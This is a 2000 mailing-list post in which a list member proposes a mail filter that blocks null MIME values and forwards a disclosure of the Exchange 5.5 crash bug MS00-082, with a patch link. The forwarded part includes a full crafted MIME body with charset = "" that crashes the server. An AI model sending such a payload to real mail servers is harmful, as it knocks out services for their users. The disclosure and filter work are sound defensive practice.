[Esa-l] Exploit scenario: Microsoft Security Bulletin (MS00-082) (fwd)
John D. Hardin
jhardin at wolfenet.com
Sun Nov 5 09:10:02 PST 2000
I have a first-cut sanitization of this, which triggers on *any* MIME
value being explicitly set to null.
Does anybody know whether this shotgun approach will break anything?
Is there any legitimate reason to explicitly set some value in a MIME
header to null?
Beta testers welcome.
--
John Hardin KA7OHZ ICQ#15735746 http://www.wolfenet.com/~jhardin/
jhardin at wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin
768: 0x41EA94F5 - A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
1024: 0xB8732E79 - 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
-----------------------------------------------------------------------
"Bother," said Pooh as he struggled with /etc/sendmail.cf, "it never
does quite what I want. I wish Christopher Robin was here."
-- Peter da Silva in a.s.r
-----------------------------------------------------------------------
2 days until the political ads stop - don't forget to vote!
---------- Abridged Forwarded message ----------
Date: Thu, 2 Nov 2000 15:02:54 -0500
From: Art Savelev <asavelev at ENI-NET.COM>
To: NTBUGTRAQ at LISTSERV.NTBUGTRAQ.COM
Subject: Exploit scenario: Microsoft Security Bulletin (MS00-082)
The following body of the e-mail message causes Microsoft Exchange 5.5
SP3 Internet Mail Service and Information Store to crash
Refer to Microsoft Security Bulletin (MS00-082)
(http://www.microsoft.com/technet/security/bulletin/ms00-082.asp).
Patch is available here:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443.
The source of the problem is charset = ""
Body:
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_ Boundary 1-KTwEv4jY84Hk"
--=_ Boundary 1-KTwEv4jY84Hk
Content-Type: text/plain;
charset = ""
Content-Transfer-Encoding: 7bit
This message is test
--=_ Boundary 1-KTwEv4jY84Hk--
--
Art Savelev
http://www.savelev.com
More information about the esd-l
mailing list